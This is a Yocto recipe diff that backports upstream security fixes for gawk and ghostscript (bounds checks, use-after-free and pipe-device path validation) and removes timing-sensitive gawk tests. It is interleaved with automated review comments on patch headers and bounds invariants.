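--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Collection of autoconf m4 macros"
 SECTION = "base"
 HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
+DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
 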
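--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Line-oriented text editor"
 HOMEPAGE = "http://www.gnu.org/software/ed/"
+DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
 
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \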
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch new file mode 100644 index 0000000000..c6cba058a7 --- /dev/null +++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch | |||
@@ -0,0 +1,28 @@ | |||
1 | From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001 | ||
2 | From: "Arnold D. Robbins" <arnold@skeeve.com> | ||
3 | Date: Wed, 3 Aug 2022 13:00:54 +0300 | ||
4 | Subject: [PATCH] Smal bug fix in builtin.c. | ||
5 | |||
6 | Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security | ||
7 | Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212] | ||
8 | CVE: CVE-2023-4156 | ||
9 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
10 | --- | ||
11 | ChangeLog | 6 ++++++ | ||
12 | builtin.c | 5 ++++- | ||
13 | 2 files changed, 10 insertions(+), 1 deletion(-) | ||
14 | |||
15 | --- gawk-5.1.0.orig/builtin.c | ||
16 | +++ gawk-5.1.0/builtin.c | ||
17 | @@ -957,7 +957,10 @@ check_pos: | ||
18 | s1++; | ||
19 | n0--; | ||
20 | } | ||
21 | - if (val >= num_args) { | ||
22 | + // val could be less than zero if someone provides a field width | ||
23 | + // so large that it causes integer overflow. Mainly fuzzers do this, | ||
24 | + // but let's try to be good anyway. | ||
25 | + if (val < 0 || val >= num_args) { | ||
26 | toofew = true; | ||
27 | break; | ||
28 | } | ||
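Review bot: The added `val < 0` test in the `check_pos` hunk only catches an overflow that happens to leave `val` negative; the code that accumulates `val` is outside the hunk, so it cannot be confirmed from here that a wrapped value can never land back inside `[0, num_args)`, and signed overflow is undefined behaviour in C in any case. A bound on the accumulated width where `val` is built would stop the overflow at its source rather than after the fact, which is a point for upstream since this is a verbatim backport. Separately, the patch header's diffstat lists `ChangeLog | 6 ++++++` but the body carries only the `builtin.c` hunk, so a header line such as `ChangeLog hunk dropped from the upstream commit.` would tell the next person auditing this CVE fix that the omission is deliberate.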
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch new file mode 100644 index 0000000000..167c0787ee --- /dev/null +++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch | |||
@@ -0,0 +1,24 @@ | |||
1 | These tests require an unloaded host as otherwise timing sensitive tests can fail | ||
2 | https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371 | ||
3 | |||
4 | Upstream-Status: Inappropriate | ||
5 | Signed-off-by: Ross Burton <ross.burton@arm.com> | ||
6 | |||
7 | --- a/test/Maketests~ | ||
8 | +++ b/test/Maketests | ||
9 | @@ -2069,7 +2069,2 @@ | ||
10 | |||
11 | -timeout: | ||
12 | - @echo $@ $(ZOS_FAIL) | ||
13 | - @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@ | ||
14 | - @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ | ||
15 | - | ||
16 | typedregex1: | ||
17 | @@ -2297,7 +2292,2 @@ | ||
18 | @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ | ||
19 | - | ||
20 | -time: | ||
21 | - @echo $@ | ||
22 | - @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@ | ||
23 | - @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ | ||
24 | |||
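Review bot: The `Upstream-Status: Inappropriate` trailer in this patch header gives no reason, which makes it hard to tell later why the `timeout` and `time` targets were removed from `test/Maketests` and whether the removal can be reverted. The sentence above it already has the explanation, so the trailer could carry it directly, for example `Upstream-Status: Inappropriate [timing-sensitive tests, unreliable on loaded hosts]`.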
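--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
 PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
 
 SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
+file://remove-sensitive-tests.patch \
 file://run-ptest \
+file://CVE-2023-4156.patch \
 "
 
 SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
 do_install_ptest() {
 mkdir ${D}${PTEST_PATH}/test
 ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
-for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \
-do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \
+# The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
+TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
+for i in $TESTS Maketests inclib.awk; do
+cp ${S}/test/$i* ${D}${PTEST_PATH}/test
 done
 sed -i -e 's|/usr/local/bin|${bindir}|g' \
 -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
 
 sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+
+# These tests require an unloaded host as otherwise timing sensitive tests can fail
+# https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+rm -f ${D}${PTEST_PATH}/test/time.*
+rm -f ${D}${PTEST_PATH}/test/timeout.*
 }
 
 RDEPENDS_${PN}-ptest += "make"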
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch new file mode 100644 index 0000000000..91b9f6df50 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch | |||
@@ -0,0 +1,31 @@ | |||
1 | From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Mon, 17 Jul 2023 14:06:37 +0100 | ||
4 | Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from | ||
5 | devices/gdevpcx.c | ||
6 | |||
7 | Bounds check the buffer, before dereferencing the pointer. | ||
8 | |||
9 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f] | ||
10 | CVE: CVE-2023-38559 | ||
11 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
12 | --- | ||
13 | base/gdevdevn.c | 2 +- | ||
14 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
15 | |||
16 | diff --git a/base/gdevdevn.c b/base/gdevdevn.c | ||
17 | index 3b019d6..2888776 100644 | ||
18 | --- a/base/gdevdevn.c | ||
19 | +++ b/base/gdevdevn.c | ||
20 | @@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file | ||
21 | byte data = *from; | ||
22 | |||
23 | from += step; | ||
24 | - if (data != *from || from == end) { | ||
25 | + if (from >= end || data != *from) { | ||
26 | if (data >= 0xc0) | ||
27 | gp_fputc(0xc1, file); | ||
28 | } else { | ||
29 | -- | ||
30 | 2.25.1 | ||
31 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch new file mode 100644 index 0000000000..ea8bf26f3f --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch | |||
@@ -0,0 +1,109 @@ | |||
1 | From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001 | ||
2 | From: Ken Sharp <ken.sharp@artifex.com> | ||
3 | Date: Wed, 20 May 2020 16:02:07 +0100 | ||
4 | Subject: [PATCH] txtwrite - address memory problems | ||
5 | |||
6 | Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)" | ||
7 | Also bug #702346 and the earlier report #701877. | ||
8 | |||
9 | The problems occur because its possible for a single character code in | ||
10 | a PDF file to map to more than a single Unicode code point. In the case | ||
11 | of the file for 701877 the character code maps to 'f' and 'i' (it is an | ||
12 | fi ligature). | ||
13 | |||
14 | The code should deal with this, but we need to ensure we are using the | ||
15 | correct index. In addition, if we do get more Unicode code points than | ||
16 | we expected, we need to set the widths of the 'extra' code points to | ||
17 | zero (we only want to consider the width of the original character). | ||
18 | |||
19 | This does mean increasing the size of the Widths array to cater for | ||
20 | the possibility of more entries on output than there were on input. | ||
21 | |||
22 | While working on it I noticed that the Unicode remapping on little- | ||
23 | endian machines was reversing the order of the Unicode values, when | ||
24 | there was more than a single code point returned, so fixed that at | ||
25 | the same time. | ||
26 | |||
27 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874] | ||
28 | CVE: CVE-2020-36773 | ||
29 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
30 | --- | ||
31 | devices/vector/gdevtxtw.c | 26 ++++++++++++++++---------- | ||
32 | 1 file changed, 16 insertions(+), 10 deletions(-) | ||
33 | |||
34 | diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c | ||
35 | index 87f9355..bddce5a 100644 | ||
36 | --- a/devices/vector/gdevtxtw.c | ||
37 | +++ b/devices/vector/gdevtxtw.c | ||
38 | @@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph, | ||
39 | #else | ||
40 | b = (char *)Buffer; | ||
41 | u = (char *)unicode; | ||
42 | - while (l >= 0) { | ||
43 | - *b++ = *(u + l); | ||
44 | - l--; | ||
45 | - } | ||
46 | |||
47 | + for (l=0;l<length;l+=2, u+=2){ | ||
48 | + *b++ = *(u+1); | ||
49 | + *b++ = *u; | ||
50 | + } | ||
51 | #endif | ||
52 | gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer"); | ||
53 | return length / sizeof(short); | ||
54 | @@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte) | ||
55 | &penum->text_state->matrix, &wanted); | ||
56 | pte->returned.total_width.x += wanted.x; | ||
57 | pte->returned.total_width.y += wanted.y; | ||
58 | - penum->Widths[pte->index - 1] = wanted.x; | ||
59 | + penum->Widths[penum->TextBufferIndex] = wanted.x; | ||
60 | |||
61 | if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) { | ||
62 | gs_point tpt; | ||
63 | @@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte) | ||
64 | pte->returned.total_width.x += dpt.x; | ||
65 | pte->returned.total_width.y += dpt.y; | ||
66 | |||
67 | - penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]); | ||
68 | - penum->Widths[pte->index - 1] += dpt.x; | ||
69 | + penum->Widths[penum->TextBufferIndex] += dpt.x; | ||
70 | + code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]); | ||
71 | + /* If a single text code returned multiple Unicode values, then we need to set the | ||
72 | + * 'extra' code points' widths to 0. | ||
73 | + */ | ||
74 | + if (code > 1) | ||
75 | + memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float)); | ||
76 | + penum->TextBufferIndex += code; | ||
77 | } | ||
78 | return 0; | ||
79 | } | ||
80 | @@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum) | ||
81 | if (!penum->text_state->Widths) | ||
82 | return gs_note_error(gs_error_VMerror); | ||
83 | memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float)); | ||
84 | - memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float)); | ||
85 | + memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float)); | ||
86 | |||
87 | unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory, | ||
88 | penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer"); | ||
89 | @@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum) | ||
90 | if (!unsorted_entry->Widths) | ||
91 | return gs_note_error(gs_error_VMerror); | ||
92 | memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float)); | ||
93 | - memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float)); | ||
94 | + memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float)); | ||
95 | |||
96 | unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory, | ||
97 | (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer"); | ||
98 | @@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte) | ||
99 | if (!penum->TextBuffer) | ||
100 | return gs_note_error(gs_error_VMerror); | ||
101 | penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory, | ||
102 | - pte->text.size, sizeof(float), "txtwrite temporary widths array"); | ||
103 | + pte->text.size * 4, sizeof(float), "txtwrite temporary widths array"); | ||
104 | if (!penum->Widths) | ||
105 | return gs_note_error(gs_error_VMerror); | ||
106 | } | ||
107 | -- | ||
108 | 2.25.1 | ||
109 | |||
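Review bot: The `pte->text.size * 4` sizing of `penum->Widths` in the `textw_text_process` hunk is an unexplained bound, and nothing visible checks `penum->TextBufferIndex + code` against it before the `memset` and the `Widths[penum->TextBufferIndex]` writes added in `txtwrite_process_plain_text`. If one text code can expand to more Unicode code points than that factor allows for, those writes would run past the allocation; the `TextBuffer` allocation is outside the hunk, so it is not clear from here whether it is sized the same way. A comment at the allocation such as `/* x4: one text code may expand to several Unicode code points (e.g. ligatures) */` and a guard before the `memset` along the lines of `if (penum->TextBufferIndex + code > pte->text.size * 4) return_error(gs_error_rangecheck);` would make the invariant explicit. Since this is a verbatim backport and the function bodies continue outside the hunks, the guard is better raised upstream than carried as a local change.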
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch new file mode 100644 index 0000000000..033ba77f9a --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch | |||
@@ -0,0 +1,121 @@ | |||
1 | From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Thu, 20 Aug 2020 17:19:09 +0100 | ||
4 | Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions | ||
5 | |||
6 | Firstly, in gx_device_delete_output_file the iodev pointer was being passed | ||
7 | to the delete_method incorrectly (passing a pointer to that pointer). Thus | ||
8 | when we attempted to use that to confirm permission to delete the file, it | ||
9 | crashed. Credit to Ken for finding that. | ||
10 | |||
11 | Secondly, due to the way pdfwrite works, when running with an output file per | ||
12 | page, it creates the current output file immediately it has completed writing | ||
13 | the previous one. Thus, it has to delete that partial file on exit. | ||
14 | |||
15 | Previously, the output file was not added to the "control" permission list, | ||
16 | so an attempt to delete it would result in an error. So add the output file | ||
17 | to the "control" as well as "write" list. | ||
18 | |||
19 | CVE: CVE-2021-3781 | ||
20 | |||
21 | Upstream-Status: Backport: | ||
22 | https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f | ||
23 | |||
24 | Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> | ||
25 | --- | ||
26 | base/gsdevice.c | 2 +- | ||
27 | base/gslibctx.c | 20 ++++++++++++++------ | ||
28 | 2 files changed, 15 insertions(+), 7 deletions(-) | ||
29 | |||
30 | diff --git a/base/gsdevice.c b/base/gsdevice.c | ||
31 | index 913119495..ac78af93f 100644 | ||
32 | --- a/base/gsdevice.c | ||
33 | +++ b/base/gsdevice.c | ||
34 | @@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname) | ||
35 | parsed.len = strlen(parsed.fname); | ||
36 | } | ||
37 | if (parsed.iodev) | ||
38 | - code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname); | ||
39 | + code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname); | ||
40 | else | ||
41 | code = gs_note_error(gs_error_invalidfileaccess); | ||
42 | |||
43 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
44 | index d726c58b5..ff8fc895e 100644 | ||
45 | --- a/base/gslibctx.c | ||
46 | +++ b/base/gslibctx.c | ||
47 | @@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
48 | char *fp, f[gp_file_name_sizeof]; | ||
49 | const int pipe = 124; /* ASCII code for '|' */ | ||
50 | const int len = strlen(fname); | ||
51 | - int i; | ||
52 | + int i, code; | ||
53 | |||
54 | /* Be sure the string copy will fit */ | ||
55 | if (len >= gp_file_name_sizeof) | ||
56 | @@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
57 | rewrite_percent_specifiers(f); | ||
58 | for (i = 0; i < len; i++) { | ||
59 | if (f[i] == pipe) { | ||
60 | - int code; | ||
61 | - | ||
62 | fp = &f[i + 1]; | ||
63 | /* Because we potentially have to check file permissions at two levels | ||
64 | for the output file (gx_device_open_output_file and the low level | ||
65 | @@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
66 | if (code < 0) | ||
67 | return code; | ||
68 | break; | ||
69 | + code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
70 | + if (code < 0) | ||
71 | + return code; | ||
72 | } | ||
73 | if (!IS_WHITESPACE(f[i])) | ||
74 | break; | ||
75 | } | ||
76 | + code = gs_add_control_path(mem, gs_permit_file_control, fp); | ||
77 | + if (code < 0) | ||
78 | + return code; | ||
79 | return gs_add_control_path(mem, gs_permit_file_writing, fp); | ||
80 | } | ||
81 | |||
82 | @@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
83 | char *fp, f[gp_file_name_sizeof]; | ||
84 | const int pipe = 124; /* ASCII code for '|' */ | ||
85 | const int len = strlen(fname); | ||
86 | - int i; | ||
87 | + int i, code; | ||
88 | |||
89 | /* Be sure the string copy will fit */ | ||
90 | if (len >= gp_file_name_sizeof) | ||
91 | @@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
92 | /* Try to rewrite any %d (or similar) in the string */ | ||
93 | for (i = 0; i < len; i++) { | ||
94 | if (f[i] == pipe) { | ||
95 | - int code; | ||
96 | - | ||
97 | fp = &f[i + 1]; | ||
98 | /* Because we potentially have to check file permissions at two levels | ||
99 | for the output file (gx_device_open_output_file and the low level | ||
100 | @@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
101 | the pipe_fopen(), the leading '|' has been stripped. | ||
102 | */ | ||
103 | code = gs_remove_control_path(mem, gs_permit_file_writing, f); | ||
104 | + if (code < 0) | ||
105 | + return code; | ||
106 | + code = gs_remove_control_path(mem, gs_permit_file_control, f); | ||
107 | if (code < 0) | ||
108 | return code; | ||
109 | break; | ||
110 | @@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
111 | if (!IS_WHITESPACE(f[i])) | ||
112 | break; | ||
113 | } | ||
114 | + code = gs_remove_control_path(mem, gs_permit_file_control, fp); | ||
115 | + if (code < 0) | ||
116 | + return code; | ||
117 | return gs_remove_control_path(mem, gs_permit_file_writing, fp); | ||
118 | } | ||
119 | |||
120 | -- | ||
121 | 2.25.1 | ||
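Review bot: The `Upstream-Status: Backport:` trailer in this patch header puts the URL on the following line, which differs from the bracketed single-line form the other backports in this change use (for example CVE-2020-36773.patch); CVE-2021-3781_2.patch and CVE-2021-3781_3.patch carry the same header. Writing it as `Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f]` keeps the status and its source together for anyone auditing the CVE fix. The three parts also depend on each other, since part 2 corrects the placement of a call this part adds and part 3 rewrites the same functions, so they need to stay in this order in the recipe's SRC_URI, which is not in view here.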
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch new file mode 100644 index 0000000000..beade79eef --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch | |||
@@ -0,0 +1,37 @@ | |||
1 | From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Mon, 24 Aug 2020 09:24:31 +0100 | ||
4 | Subject: [PATCH] Coverity 361429: move "break" to correct place. | ||
5 | |||
6 | We had to add the outputfile to the "control" file permission list (as well | ||
7 | as write), but for the "pipe" case, I accidentally added the call after the | ||
8 | break out of loop that checks for a pipe. | ||
9 | |||
10 | CVE: CVE-2021-3781 | ||
11 | |||
12 | Upstream-Status: Backport: | ||
13 | https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382 | ||
14 | |||
15 | Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> | ||
16 | --- | ||
17 | base/gslibctx.c | 2 +- | ||
18 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
19 | |||
20 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
21 | index ff8fc895e..63dfbe2e0 100644 | ||
22 | --- a/base/gslibctx.c | ||
23 | +++ b/base/gslibctx.c | ||
24 | @@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
25 | code = gs_add_control_path(mem, gs_permit_file_writing, f); | ||
26 | if (code < 0) | ||
27 | return code; | ||
28 | - break; | ||
29 | code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
30 | if (code < 0) | ||
31 | return code; | ||
32 | + break; | ||
33 | } | ||
34 | if (!IS_WHITESPACE(f[i])) | ||
35 | break; | ||
36 | -- | ||
37 | 2.25.1 | ||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch new file mode 100644 index 0000000000..e3f9e81c45 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch | |||
@@ -0,0 +1,238 @@ | |||
1 | From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Tue, 7 Sep 2021 20:36:12 +0100 | ||
4 | Subject: [PATCH] Bug 704342: Include device specifier strings in access | ||
5 | validation | ||
6 | |||
7 | for the "%pipe%", %handle%" and %printer% io devices. | ||
8 | |||
9 | We previously validated only the part after the "%pipe%" Postscript device | ||
10 | specifier, but this proved insufficient. | ||
11 | |||
12 | This rebuilds the original file name string, and validates it complete. The | ||
13 | slight complication for "%pipe%" is it can be reached implicitly using | ||
14 | "|" so we have to check both prefixes. | ||
15 | |||
16 | Addresses CVE-2021-3781 | ||
17 | |||
18 | CVE: CVE-2021-3781 | ||
19 | |||
20 | Upstream-Status: Backport: | ||
21 | https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde | ||
22 | |||
23 | Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> | ||
24 | --- | ||
25 | base/gdevpipe.c | 22 +++++++++++++++- | ||
26 | base/gp_mshdl.c | 11 +++++++- | ||
27 | base/gp_msprn.c | 10 ++++++- | ||
28 | base/gp_os2pr.c | 13 +++++++++- | ||
29 | base/gslibctx.c | 69 ++++++++++--------------------------------------- | ||
30 | 5 files changed, 65 insertions(+), 60 deletions(-) | ||
31 | |||
32 | diff --git a/base/gdevpipe.c b/base/gdevpipe.c | ||
33 | index 96d71f5d8..5bdc485be 100644 | ||
34 | --- a/base/gdevpipe.c | ||
35 | +++ b/base/gdevpipe.c | ||
36 | @@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
37 | #else | ||
38 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
39 | gs_fs_list_t *fs = ctx->core->fs; | ||
40 | + /* The pipe device can be reached in two ways, explicltly with %pipe% | ||
41 | + or implicitly with "|", so we have to check for both | ||
42 | + */ | ||
43 | + char f[gp_file_name_sizeof]; | ||
44 | + const char *pipestr = "|"; | ||
45 | + const size_t pipestrlen = strlen(pipestr); | ||
46 | + const size_t preflen = strlen(iodev->dname); | ||
47 | + const size_t nlen = strlen(fname); | ||
48 | + int code1; | ||
49 | + | ||
50 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
51 | + return_error(gs_error_invalidaccess); | ||
52 | + | ||
53 | + memcpy(f, iodev->dname, preflen); | ||
54 | + memcpy(f + preflen, fname, nlen + 1); | ||
55 | + | ||
56 | + code1 = gp_validate_path(mem, f, access); | ||
57 | + | ||
58 | + memcpy(f, pipestr, pipestrlen); | ||
59 | + memcpy(f + pipestrlen, fname, nlen + 1); | ||
60 | |||
61 | - if (gp_validate_path(mem, fname, access) != 0) | ||
62 | + if (code1 != 0 && gp_validate_path(mem, f, access) != 0 ) | ||
63 | return gs_error_invalidfileaccess; | ||
64 | |||
65 | /* | ||
66 | diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c | ||
67 | index 2b964ed74..8d87ceadc 100644 | ||
68 | --- a/base/gp_mshdl.c | ||
69 | +++ b/base/gp_mshdl.c | ||
70 | @@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
71 | long hfile; /* Correct for Win32, may be wrong for Win64 */ | ||
72 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
73 | gs_fs_list_t *fs = ctx->core->fs; | ||
74 | + char f[gp_file_name_sizeof]; | ||
75 | + const size_t preflen = strlen(iodev->dname); | ||
76 | + const size_t nlen = strlen(fname); | ||
77 | |||
78 | - if (gp_validate_path(mem, fname, access) != 0) | ||
79 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
80 | + return_error(gs_error_invalidaccess); | ||
81 | + | ||
82 | + memcpy(f, iodev->dname, preflen); | ||
83 | + memcpy(f + preflen, fname, nlen + 1); | ||
84 | + | ||
85 | + if (gp_validate_path(mem, f, access) != 0) | ||
86 | return gs_error_invalidfileaccess; | ||
87 | |||
88 | /* First we try the open_handle method. */ | ||
89 | diff --git a/base/gp_msprn.c b/base/gp_msprn.c | ||
90 | index ed4827968..746a974f7 100644 | ||
91 | --- a/base/gp_msprn.c | ||
92 | +++ b/base/gp_msprn.c | ||
93 | @@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
94 | unsigned long *ptid = &((tid_t *)(iodev->state))->tid; | ||
95 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
96 | gs_fs_list_t *fs = ctx->core->fs; | ||
97 | + const size_t preflen = strlen(iodev->dname); | ||
98 | + const size_t nlen = strlen(fname); | ||
99 | |||
100 | - if (gp_validate_path(mem, fname, access) != 0) | ||
101 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
102 | + return_error(gs_error_invalidaccess); | ||
103 | + | ||
104 | + memcpy(pname, iodev->dname, preflen); | ||
105 | + memcpy(pname + preflen, fname, nlen + 1); | ||
106 | + | ||
107 | + if (gp_validate_path(mem, pname, access) != 0) | ||
108 | return gs_error_invalidfileaccess; | ||
109 | |||
110 | /* First we try the open_printer method. */ | ||
